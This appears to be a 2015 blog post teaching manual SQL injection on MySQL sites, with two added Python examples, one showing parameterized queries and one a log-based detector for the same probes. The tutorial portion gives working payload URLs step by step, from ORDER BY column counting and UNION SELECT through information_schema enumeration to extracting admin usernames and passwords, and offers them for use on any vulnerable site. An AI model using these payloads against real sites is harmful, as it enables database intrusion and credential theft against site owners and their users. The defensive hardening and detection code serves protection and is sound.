Monday, 19 January 2015

MySQL Database Manual SQL Injection Tutorial

Hello guys, hope you all are doing great. Today I will explain manual SQL injection on a MySQL database. The only requirements are an SQLi-vulnerable site and some patience. For this tutorial we'll be using "http://www.target.com" as an example.

Let's get started.

[#] Find the Number of Columns


The first step is to find the number of columns the query has. Add "order by 1--" (without quotes) to the end of the URL.

Example:

http://target.com/news.php?id=76 order by 1--

Then increment the 1 until you get an error saying "unknown column".

Example:

http://target.com/news.php?id=76 order by 1-- NO ERROR 
http://target.com/news.php?id=76 order by 2-- NO ERROR 
http://target.com/news.php?id=76 order by 3-- NO ERROR 
http://target.com/news.php?id=76 order by 4-- NO ERROR 
http://target.com/news.php?id=76 order by 5-- ERROR
We got an error at 5, which means there are 4 columns.

[#] Finding Vulnerable Columns

Now that we have found the number of columns, it's time to find the vulnerable column using a "union select" statement. First remove everything we have added. Then null the parameter by adding "-" (without quotes) before the number.

Example:
http://target.com/news.php?id=-76
In our first step we found there are 4 columns, so our query will be:

Example:
http://target.com/news.php?id=-76 union select 1,2,3,4--
Now you will see some numbers on screen; choose any of them. For our example we will take 3.
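To see why the ORDER BY and UNION SELECT probes above behave the way they do, here is an added example that is not part of the original tutorial: a small Python script with a constructed in-memory SQLite database standing in for the news.php backend (the table name, its four columns and the row with id 76 are all assumptions). It runs the same payloads through a query that concatenates the id parameter and through a hardened version that validates the type and binds it as a parameter.

```python
import sqlite3

# Constructed stand-in for the tutorial's news.php backend (assumption: the real
# schema is unknown, so a 4-column "news" table matches the ORDER BY result above).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE news (id INTEGER, title TEXT, body TEXT, author TEXT);
        INSERT INTO news VALUES (76, 'Hello', 'First post', 'editor');
    """)
    return conn

def vulnerable_lookup(conn, raw_id):
    """Concatenates the raw parameter: whatever follows the number is parsed as SQL."""
    sql = "SELECT id, title, body, author FROM news WHERE id = " + raw_id
    return conn.execute(sql).fetchall()

def hardened_lookup(conn, raw_id):
    """Validates the type first, then binds the value so it can only ever be data."""
    news_id = int(raw_id)   # ValueError for anything that is not a plain integer
    sql = "SELECT id, title, body, author FROM news WHERE id = ?"
    return conn.execute(sql, (news_id,)).fetchall()

def classify(lookup, raw_id):
    """Run one lookup on a fresh database and summarise the outcome as a tuple."""
    conn = make_db()
    try:
        rows = lookup(conn, raw_id)
    except ValueError:
        return ("rejected", "parameter is not an integer")
    except sqlite3.OperationalError as exc:
        return ("sql_error", str(exc))
    finally:
        conn.close()
    return ("rows", rows)

if __name__ == "__main__":
    for payload in ["76", "76 order by 4--", "76 order by 5--", "-76 union select 1,2,3,4--"]:
        print(f"{payload!r:32} vulnerable: {classify(vulnerable_lookup, payload)}")
        print(f"{'':32} hardened:   {classify(hardened_lookup, payload)}")
```

With the concatenated query, "order by 4" succeeds, "order by 5" raises an out-of-range error (SQLite words it differently from MySQL's "Unknown column", but the signal is the same), and the negative id plus UNION returns the attacker-chosen row 1,2,3,4. The hardened lookup rejects every one of those payloads before any SQL runs, and even a value that passes int() is bound as a parameter rather than spliced into the statement.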

[#] Finding Version

Now that we know the vulnerable column (3 in our example), it's time to check which version of MySQL is running. We have to check this because injecting version 4 and version 5 is different. Replace the 3 with "version()".

Example:
http://www.target.com/index.php?id=-2 union select 1,2,version(),4--

It will show the MySQL version, something like 5.1.52-log.

[#] Finding the Table Name

Now we have to find the table names. If the version you got is 4.x.x, you pretty much have to guess everything. MySQL 5 introduced information_schema, which stores table and column names, and group_concat(), which returns all the information at once, making our job a lot easier. I will be explaining MySQL 5. Replace the 3 with "group_concat(table_name)" and add "from information_schema.tables where table_schema=database()--" to the end.

Example:

http://www.target.com/index.php?id=-2 union select 1,2,group_concat(table_name),4 from information_schema.tables where table_schema=database()--

Now it will show the list of all table names in the database. Choose any table name you wish; in our example we will take "admin".

[#] Finding the Column Name

Now replace "group_concat(table_name)" with "group_concat(column_name)" and replace "from information_schema.tables where table_schema=database()--" with "from information_schema.columns where table_name=0x41646d696e--".

Example:
http://www.target.com/index.php?id=-2 union select 1,2,group_concat(column_name),4 from information_schema.columns where table_name=0x41646d696e--


If you have noticed, you might be wondering what "0x41646d696e" is. This is a hex literal: 41646d696e is the hex encoding of our table name (note that 0x41 is a capital "A", so this literal spells "Admin"; lowercase "admin" would be 0x61646d696e), and the 0x prefix tells MySQL to read it as hex. We have to write the table name as hex in order to retrieve the info. For converting text to hex you can use this website:
http://www.swingnote.com/tools/texttohex.php
OK, now we will have the column names.

[#] Final Data Extraction

Say, for instance, we got the columns username and password. Replace "group_concat(column_name)" with "group_concat(username,0x3a,password)" and "from information_schema.columns where table_name=0x41646d696e--" with "from admin".

Example:
www.target.com/news.php?id=-76+union+select+1,2,group_concat(username,0x3a,password),4+from+admin

0x3a is the hex value of ":"; it's just there to separate the results.
Now finally we can see the data :D
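From the defender's side, every step of this walkthrough leaves a distinctive trail in the web server's access log: a run of "order by N" requests with rising N from one client, then "union select", information_schema lookups, group_concat and hex literals. The following added example (not part of the original post) parses constructed Apache-style log lines that replay the tutorial's own URLs against a fictional host, flags the individual signatures, and separately detects the column-enumeration sequence. The log format regex and the sample IPs are assumptions.

```python
import re
from urllib.parse import unquote_plus

# Apache combined/common log prefix: ip ident user [time] "METHOD path PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3}) \S+'
)

# Signatures for the probes used in the tutorial, matched on the URL-decoded path.
SIGNATURES = [
    ("order_by_probe", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("union_select", re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),
    ("information_schema", re.compile(r"\binformation_schema\.(tables|columns)\b", re.I)),
    ("group_concat", re.compile(r"\bgroup_concat\s*\(", re.I)),
    ("hex_literal", re.compile(r"\b0x[0-9a-f]{2,}\b", re.I)),
    ("version_call", re.compile(r"\bversion\s*\(\s*\)", re.I)),
]

# Constructed sample log: the tutorial's requests replayed by one client, plus one normal visitor.
SAMPLE_LOG = [
    '203.0.113.7 - - [19/Jan/2015:10:00:01 +0000] "GET /news.php?id=76 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [19/Jan/2015:10:00:05 +0000] "GET /news.php?id=76%20order%20by%201-- HTTP/1.1" 200 5120',
    '203.0.113.7 - - [19/Jan/2015:10:00:08 +0000] "GET /news.php?id=76%20order%20by%202-- HTTP/1.1" 200 5120',
    '203.0.113.7 - - [19/Jan/2015:10:00:11 +0000] "GET /news.php?id=76%20order%20by%203-- HTTP/1.1" 200 5120',
    '203.0.113.7 - - [19/Jan/2015:10:00:14 +0000] "GET /news.php?id=76%20order%20by%204-- HTTP/1.1" 200 5120',
    '203.0.113.7 - - [19/Jan/2015:10:00:17 +0000] "GET /news.php?id=76%20order%20by%205-- HTTP/1.1" 500 312',
    '203.0.113.7 - - [19/Jan/2015:10:00:25 +0000] "GET /news.php?id=-76+union+select+1,2,3,4-- HTTP/1.1" 200 4011',
    '203.0.113.7 - - [19/Jan/2015:10:01:02 +0000] "GET /news.php?id=-76+union+select+1,2,group_concat(table_name),4+from+information_schema.tables+where+table_schema=database()-- HTTP/1.1" 200 4200',
    '198.51.100.2 - - [19/Jan/2015:10:01:30 +0000] "GET /news.php?id=77 HTTP/1.1" 200 5100',
]

def parse_line(line):
    """Return the parsed fields plus the URL-decoded path, or None if the line does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["decoded"] = unquote_plus(rec["path"])   # turns %20 and + back into spaces
    return rec

def scan(lines):
    """Per-line findings: (client ip, decoded path, [matched signature names])."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        tags = [name for name, rx in SIGNATURES if rx.search(rec["decoded"])]
        if tags:
            findings.append((rec["ip"], rec["decoded"], tags))
    return findings

def column_enumeration(lines, min_steps=3):
    """Clients that sent at least min_steps 'order by N' requests with N never decreasing."""
    by_ip = {}
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        m = re.search(r"\border\s+by\s+(\d+)", rec["decoded"], re.I)
        if m:
            by_ip.setdefault(rec["ip"], []).append(int(m.group(1)))
    return {ip: ns for ip, ns in by_ip.items() if len(ns) >= min_steps and ns == sorted(ns)}

if __name__ == "__main__":
    for ip, path, tags in scan(SAMPLE_LOG):
        print(f"{ip:14} {','.join(tags):45} {path}")
    print("column enumeration:", column_enumeration(SAMPLE_LOG))
```

The single-request signatures will fire on any "order by" that appears in a query string, so on an application that legitimately passes sort expressions in the URL they need tuning; the sequence detector is the more reliable signal for this particular technique, because normal users do not walk an ORDER BY index upward until the server returns a 500.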


That's all guys!
Stay safe and good luck!

